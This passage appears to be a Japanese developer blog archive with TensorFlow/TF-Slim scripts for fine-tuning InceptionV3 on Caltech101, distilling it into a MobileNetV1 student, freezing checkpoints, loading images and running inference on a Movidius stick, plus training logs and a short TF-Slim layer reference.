            num_classes=N_CLASSES,
            is_training=tf_is_training)#,
            #depth_multiplier=1.0)
        return stu2_logits, stu2_end_points


# In[5]:


# def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False):
#     with tf.variable_scope(scope, reuse = reuse) as sc:
#         with slim.arg_scope([slim.conv2d],
#                             kernel_size = [3,3],
#                             stride = [1,1],
#                             biases_initializer=tf.constant_initializer(0.0),
#                             activation_fn=tf.nn.relu):
                                                      
#             net = slim.conv2d(input, 32, scope='conv1')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
#             net = tf.nn.dropout(net, keep_prob_conv)

#             net = slim.conv2d(net, 64,scope='conv2')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
#             net = tf.nn.dropout(net, keep_prob_conv)

#             net = slim.conv2d(net, 128,scope='conv3')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
#             net = tf.nn.dropout(net, keep_prob_conv)
            
#             net = slim.conv2d(net, 256,scope='conv4')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')
#             net = tf.nn.dropout(net, keep_prob_conv)
    
#             net = slim.flatten(net)
#         with slim.arg_scope([slim.fully_connected],
#                             biases_initializer=tf.constant_initializer(0.0),
#                             activation_fn=tf.nn.relu) :
            
#             net = slim.fully_connected(net,1000,scope='fc1') # 625
#             net = tf.nn.dropout(net, keep_prob_hidden)
#             net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
            
#             #net = tf.nn.softmax(net/temperature)
#             return net


# In[6]:


def loss(prediction,output):#,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        tf.cast(output, tf.float32) * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy#,accuracy


# In[7]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        tf_Y = tf.placeholder(tf.int32, shape=[None, N_CLASSES], name="Y")
        tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha")
        tf_is_training = tf.placeholder_with_default(False, shape=None,
                                                     name="is_training")
        stu_keep_prob_conv = tf.placeholder(tf.float32)
        stu_keep_prob_hidden = tf.placeholder(tf.float32)
        
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")
        scaled_inputs = tf_X

    # BODY
    arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=tf_is_training,
            dropout_keep_prob=0.8)
        
    with tf.name_scope("softmax") as scope:
        tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax")
        tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual")
        
        
    # Student     
#     stu_logits = NetworkStudent(scaled_inputs, stu_keep_prob_conv,
#                                stu_keep_prob_hidden, scope='student')
#     with tf.name_scope("stu_struct"):
#         # softmax
#         stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
#         stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")
        
    mbnet_logits, mbnet_end_point = NetworkStudent2(
        scaled_inputs, tf_is_training=tf_is_training, scope='mbnet')
    with tf.name_scope("mbnet_struct"):
        # softmax
        mbnet_y = tf.nn.softmax(mbnet_logits/temperature, name="softmax")
        mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax")
        
        
    # Seperate vars
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'InceptionV3' in var.name]
    #var_student = [var for var in model_vars if 'student' in var.name]
    save_vars = tf.global_variables()
    var_mbnet = [var for var in save_vars if 'MobilenetV1' in var.name]
   

    # PREDICTIONS
    tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds")

    # LOSS - Sums all losses (even Regularization losses)
    with tf.variable_scope('loss') as scope:
        #unrolled_labels = tf.reshape(tf_Y, (-1,))
        #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels,
        
        #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits)
        #tf_loss = tf.losses.get_total_loss()
        
        tf_loss = loss(tch_y_actual, tf_Y)

    # OPTIMIZATION - Also updates batchnorm operations automatically
    with tf.variable_scope('opt') as scope:
        #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm
        #with tf.control_dependencies(update_ops):
        #    tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op")
        
        grad_teacher = tf.gradients(tf_loss, var_teacher)
        tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher))
            
    # Evaluation
    with tf.variable_scope('eval') as scope:
        y = tf.nn.softmax(tf_logits, name='softmax')
        accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )
        
    # PRETRAINED SAVER SETTINGS
    # Lists of scopes of weights to include/exclude from pretrained snapshot
    pretrained_include = ["InceptionV3"]
    pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"]

    # PRETRAINED SAVER - For loading pretrained weights on the first run
    pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=pretrained_include,
        exclude=pretrained_exclude)
    tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver")

    mbnet_pretrained_include = ["MobilenetV1"]
    mbnet_pretrained_exclude = ["MobilenetV1/Predictions", "MobilenetV1/Logits"]
        
    mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore(
            include=mbnet_pretrained_include, exclude=mbnet_pretrained_exclude)
    mbnet_pretrained_saver = tf.train.Saver(
        mbnet_pretrained_vars, name="mobilenet_pretrained_saver")
         
    # Student
#     with tf.name_scope("stu_train"):
#         # loss
#         #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits)
#         #stu_loss1 = tf.losses.get_total_loss()
#         stu_loss1 = loss(stu_y_actual, tf_Y)
#         stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log(
#             tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1))
#         stu_loss = 0.4 * stu_loss1 + stu_loss2
#         #stu_loss = stu_loss1
       
#         # optimization
#         grad_student = tf.gradients(stu_loss,var_student)
#         stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002)
#         #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
#         #stu_trainer = tf.train.AdadeltaOptimizer()
#         train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student))
#         #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer")
#         #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op")
#         # evaluation
#         stu_accuracy = tf.reduce_mean(
#             tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32)
#         )
        
        
    # Mobilenet V1
    with tf.name_scope("mbnet_train"):
        # loss
        #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=mbnet_logits)
        #mbnet_loss1 = tf.losses.get_total_loss()
        mbnet_loss1 = loss(mbnet_y_actual, tf_Y)
        mbnet_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log(
            tf.clip_by_value(mbnet_y, 1e-10,1.0)), reduction_indices=1))
        mbnet_loss = 0.4 * mbnet_loss1 + mbnet_loss2
        #mbnet_loss = mbnet_loss1
        
        # optimization
        grad_mbnet = tf.gradients(mbnet_loss,var_mbnet)
        mbnet_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002)
        train_step_mbnet = mbnet_trainer.apply_gradients(zip(grad_mbnet, var_mbnet))

        # evaluation
        mbnet_accuracy = tf.reduce_mean(
            tf.cast(tf.equal(
                tf.argmax(mbnet_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )

        
    
    # MAIN SAVER - For saving/restoring your complete model
    tf_saver = tf.train.Saver(var_teacher, name="saver")
    
    # STUDENT SAVER
    
    #stu_saver = tf.train.Saver(var_student, name="stu_saver")
    
    mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver")

    # TENSORBOARD - To visialize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[8]:


def initialize_vars(session):
    # INITIALIZE VARS
    LOAD_FROM_CHECKPOINT = False
    if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE):
        print(" Loading from Main Checkpoint")
        session.run(tf.global_variables_initializer())
        tf_saver.restore(session, SNAPSHOT_FILE)
    else:
        print("Initializing from Pretrained Weights")
        session.run(tf.global_variables_initializer())
        tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE)
        mbnet_pretrained_saver.restore(session, PRETRAINED_MOBILENET_FILE)


# In[9]:


with tf.Session(graph=graph) as sess:
    n_epochs = 2
    batch_size = 32 # small batch size so inception v3 can be run on laptops
    steps_per_epoch = len(X_train)//batch_size
    steps_per_epoch_val = len(X_test)//batch_size

    initialize_vars(session=sess)
    
    """
    try:
        print("#### Debuggin Section ####")
        ep2 = sess.run(stu2_end_point, feed_dict = {tf_X: [X_train[0]],
                                              tf_Y: [Y_train[0]],
                                              tf_is_training: True})
        print("EP2 : ", ep2.keys())
        print("shape of logits: ", ep2['Logits'].shape)
        print("shape of prediction: ", ep2['Predictions'].shape)
        #print("pretrained_vars: ", mbnet_pretrained_vars)"""


    print("##### Teacher Training Section #####")
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: True}
            #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict)
            tf_train_step.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evalution
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: False}            
            val_accuracy.append(accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEED BACK - once every `print_every` steps
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([tch_y, tf_loss], feed_dict = {
            tf_X: [X_test[5]],
            tf_Y: [Y_test[5]],
            tf_is_training: False
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
       
        # SAVE SNAPSHOT - after each epoch
        tf_saver.save(sess, SNAPSHOT_FILE)
        

    print("### Student Training Section ###")
    n_epochs = 30
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size
    print("/////////////////////////////////////////////////////////")
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_is_training: True}
            train_step_mbnet.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evalution
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_is_training: False}      
            val_accuracy.append(mbnet_accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEED BACK - once every `print_every` steps
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([mbnet_logits, mbnet_loss], feed_dict = {
            tf_X: X_batch,
            tf_Y: Y_batch,
            tf_is_training: False
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
        
        mbnet_saver.save(sess, MBNET_SNAPSHOT_FILE) 
    


# In[10]:


end = time.time()
print("Time : {0}".format(end-start))


# In[ ]:





# In[ ]:

変換用

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob,sys
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
import nets.mobilenet_v1


# In[2]:


MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt"
MBNET_FLOZEN_FILE = "./models/mbnet_flozen.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [224,224] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = 101                    # Change N_CLASSES to suit your needs

temperature = 20


# In[3]:


def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False):
    #with tf.variable_scope(scope, reuse = reuse) as sc:
    arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=False)#,
            #depth_multiplier=1.0)
        return stu2_logits, stu2_end_points


# In[4]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
      
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")
        scaled_inputs = tf_X
        
    # Student             
    mbnet_logits, mbnet_end_point = NetworkStudent2(scaled_inputs, scope='mbnet')
    with tf.name_scope("mbnet_struct"):
        # softmax
        mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax")
        
        
    # Seperate vars
    model_vars = tf.trainable_variables()
    var_mbnet = [var for var in model_vars if 'MobilenetV1' in var.name]

    # parameter 
    total_parameters = 0
    for variable in tf.trainable_variables():
        # shape is an array of tf.Dimension
        shape = variable.get_shape()
        #print(shape)
        #print(len(shape))
        variable_parameters = 1
        for dim in shape:
            #print(dim)
            variable_parameters *= dim.value
        #print(variable_parameters)
        total_parameters += variable_parameters
    print("total params: ",total_parameters)
    
    # STUDENT SAVER
    #mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver")
    mbnet_saver = tf.train.Saver(tf.global_variables(), name="mbnet_saver")

    # TENSORBOARD - To visialize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[5]:


with tf.Session(graph=graph) as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())
    
    mbnet_saver.restore(sess, MBNET_SNAPSHOT_FILE) 
    #sess.run(tf.initialize_all_variables())
    mbnet_saver.save(sess, MBNET_FLOZEN_FILE)

loadimg

#!/usr/bin/env python2

import os
import numpy as np
import tensorflow as tf
from keras.preprocessing.image import load_img, img_to_array
from keras.utils import np_utils
import matplotlib.pyplot as plt
import glob
from sklearn.model_selection import train_test_split


IMGSIZE = 224
IMGSIZE = 224

def loadimg_one(DIRPATH, NUM):
    x = []
    y = []

    img_list = os.listdir(DIRPATH)
    img_list = sorted(img_list)
    if (NUM) and (len(img_list) > NUM):
        img_list = img_list[:NUM]
    #print("[loadimg] : img_list : ", end=' ')
    #print(img_list)
    
    with open('categories.txt', 'w') as f:
        f.write('\n'.join(img_list))
        f.write('\n')

    img_count = 0

    for number in img_list:
        dirpath = os.path.join(DIRPATH, number)
        dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg'))
        dirpic_list += glob.glob(os.path.join(dirpath, '*.png'))
        for picture in dirpic_list:
            #img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE)))
            img = img_to_array(load_img(picture, target_size=(IMGSIZE, IMGSIZE)))
            x.append(img)
            y.append(img_count)
            #print("Load {0} : {1}".format(picture, img_count))
        img_count += 1

    output_count = img_count
    x = np.asarray(x)
    x = x.astype('float32')
    x = x/255.0
    y = np.asarray(y, dtype=np.int32)
    y = np_utils.to_categorical(y, output_count)

    return x, y, output_count


def loadimg(COMMONDIR='./', NUM=None):
    print("########## loadimg ########")

    #COMMONDIR = './make_image'
    #TRAINDIR = os.path.join(COMMONDIR, 'train')
    #TESTDIR = os.path.join(COMMONDIR, 'test')
    x, y, class_count = loadimg_one(COMMONDIR, NUM)
    #x_test,  y_test,  _  = loadimg_one(TESTDIR, NUM)
    #for i in range(0, x_test.shape[0]):
    #    plt.imshow(x_test[i])
    #    plt.show()
    #x = np.concatenate((x_train, x_test))
    #x = np.reshape(x, [-1, 784])
    #y = np.concatenate((y_train, y_test)) 

    print("x_train, y_train, x_test, y_test, class_count")
    print("x_train shape : ", x.shape)

    print("########## END of loadimg ########")
    x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.8, test_size=0.2)
    return x_train,  y_train, x_test, y_test, class_count

if __name__ == '__main__':
    loadimg()

Movidius

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = '/home/tokunn/caltech101'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

CATEGORIES_FILE = './categories.txt'
with open(CATEGORIES_FILE, 'r') as f:
    categories = f.read().split('\n')

def predict(input):
    print("Start predicting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    predict = []
    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        predict.append(np.argmax(output))
    stop = time.time()
    
    for i in predict:
        print(categories[i], end=' ', flush=True)
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.resize(image, (224, 224))
        img_list.append(image)
    img_list = np.asarray(img_list) * (1.0/255.0)
    #img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))

2018-09-22

Fine-Tuning InceptionV3

ImageNetで学習済みのInceptionV3をCaltech101にFine-Tuningする。

サイトに従ってFine-Tuning

参考 http://ronny.rest/blog/post_2017_10_13_tf_transfer_learning/

やってみる。

Inception V3の学習済みモデルはいつも通り https://github.com/tensorflow/models/tree/master/research/slim から http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gzls を選択

入出力

入力： Caltech101
出力：101
バッチサイズ：32

結果

できた

Initializing from Pretrained Weights
INFO:tensorflow:Restoring parameters from ./models/inception_v3.ckpt
----------------------------------------------
EPOCH 1/20 

100%|██████████| 216/216 [01:45<00:00,  2.41it/s]
100%|██████████| 54/54 [00:07<00:00,  8.15it/s]

    step:   53  loss: 0.3671 val accuracy: 0.8681
----------------------------------------------
EPOCH 2/20 

100%|██████████| 216/216 [01:29<00:00,  2.41it/s]
100%|██████████| 54/54 [00:06<00:00,  8.13it/s]

    step:   53  loss: 0.2679 val accuracy: 0.9236


----------------------------------------------
EPOCH 19/20 

100%|██████████| 216/216 [01:31<00:00,  2.34it/s]
100%|██████████| 54/54 [00:06<00:00,  7.97it/s]

    step:   53  loss: 0.2040 val accuracy: 0.9659
----------------------------------------------
EPOCH 20/20 

100%|██████████| 216/216 [01:31<00:00,  2.37it/s]
100%|██████████| 54/54 [00:06<00:00,  8.05it/s]

    step:   53  loss: 0.2002 val accuracy: 0.9653

ソースコード

サイトに従ったコードをナンバー用に変更したもの

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
#from __future__ import print_function, division
import loadimg
from tqdm import tqdm
import matplotlib.pyplot as plt

start = time.time()


# In[2]:


np_aryname = './models/data{0}.npy'
SAVE = False

if SAVE:
    X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg(
        '/home/tokunn/caltech101')

    np.save(np_aryname.format('X_train'), X_train)
    np.save(np_aryname.format('Y_train'), Y_train)
    np.save(np_aryname.format('X_test'), X_test)
    np.save(np_aryname.format('Y_test'), Y_test)
    np.save(np_aryname.format('number_of_classes'), number_of_classes)
    
else: # LOAD
    X_train = np.load(np_aryname.format('X_train'))
    Y_train = np.load(np_aryname.format('Y_train'))
    X_test = np.load(np_aryname.format('X_test'))
    Y_test = np.load(np_aryname.format('Y_test'))
    number_of_classes = np.load(np_aryname.format('number_of_classes'))

print("X_train", X_train.shape)
print("Y_train", Y_train.shape)
print("X_test", X_test.shape)
print("Y_test", Y_test.shape)
print("Number of Classes", number_of_classes)


# In[3]:


SNAPSHOT_FILE = "./models/snapshot.ckpt"
PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = number_of_classes                    # Change N_CLASSES to suit your needs


# In[4]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        tf_Y = tf.placeholder(tf.int32, shape=[None], name="Y")
        tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha")
        tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training")

    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # BODY
    arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=tf_is_training,
            dropout_keep_prob=0.8)

    # PREDICTIONS
    tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds")

    # LOSS - Sums all losses (even Regularization losses)
    with tf.variable_scope('loss') as scope:
        unrolled_labels = tf.reshape(tf_Y, (-1,))
        tf.losses.sparse_softmax_cross_entropy(labels=unrolled_labels,
                                               logits=tf_logits)
        tf_loss = tf.losses.get_total_loss()

    # OPTIMIZATION - Also updates batchnorm operations automatically
    with tf.variable_scope('opt') as scope:
        tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm
        with tf.control_dependencies(update_ops):
            tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op")
            
    # Evalution
    with tf.variable_scope('eval') as scope:
        y = tf.nn.softmax(tf_logits, name='softmax')
        accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(y, 1), tf.cast(tf_Y, tf.int64)), tf.float32)
        )

    # PRETRAINED SAVER SETTINGS
    # Lists of scopes of weights to include/exclude from pretrained snapshot
    pretrained_include = ["InceptionV3"]
    pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"]

    # PRETRAINED SAVER - For loading pretrained weights on the first run
    pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=pretrained_include,
        exclude=pretrained_exclude)
    tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver")

    # MAIN SAVER - For saving/restoring your complete model
    tf_saver = tf.train.Saver(name="saver")

    # TENSORBOARD - To visialize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[5]:


def initialize_vars(session):
    # INITIALIZE VARS
    if False: #tf.train.checkpoint_exists(SNAPSHOT_FILE):
        print(" Loading from Main Checkpoint")
        tf_saver.restore(session, SNAPSHOT_FILE)
    else:
        print("Initializing from Pretrained Weights")
        session.run(tf.global_variables_initializer())
        tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE)


# In[ ]:


with tf.Session(graph=graph) as sess:
    n_epochs = 20
    print_every = 32
    batch_size = 32 # small batch size so inception v3 can be run on laptops
    steps_per_epoch = len(X_train)//batch_size
    steps_per_epoch_val = len(X_test)//batch_size

    initialize_vars(session=sess)

    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
        #print("----------------------------------------------", flush=True)
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: True}
            loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict)
            
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evalution
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: False}            
            val_accuracy.append(accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEED BACK - once every `print_every` steps
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        print("\tstep: {: 4d}  loss: {:0.4f} val accuracy: {:0.4f}".format(
                    step, loss, total_val_accuracy))
        plt.plot(sess.run(tf_logits, feed_dict = {
            tf_X: [X_test[0]],
            tf_Y: [Y_test[0]],
            tf_is_training: False
        })[0])
        # SAVE SNAPSHOT - after each epoch
        tf_saver.save(sess, SNAPSHOT_FILE)


# In[ ]:


end = time.time()
print("Time : {0}".format(end-start))


# In[ ]:


plt.show()

2018-09-22

TensorFlow Slim (TF-Slim)で書いたモデルをMovidiusで動かす　＆　蒸留もどき

TF-Slimとは

TensorFlow Low Layerのマクロみたいなもの。比較的簡単に書けるようになる。

変数の定義

weights = slim.model_variable('weights', shape=[10, 10, 3 , 3])
my_var = slim.variable('my_var',
                       shape=[20, 1],
                       initializer=tf.zeros_initializer())

レイヤの追加

net = slim.conv2d(input, 128, [3, 3], scope='conv1_1')

Layer	TF-Slim
BiasAdd	slim.bias_add
BatchNorm	slim.batch_norm
Conv2d	slim.conv2d
Conv2dInPlane	slim.conv2d_in_plane
Conv2dTranspose (Deconv)	slim.conv2d_transpose
FullyConnected	slim.fully_connected
AvgPool2D	slim.avg_pool2d
Dropout	slim.dropout
Flatten	slim.flatten
MaxPool2D	slim.max_pool2d
OneHotEncoding	slim.one_hot_encoding
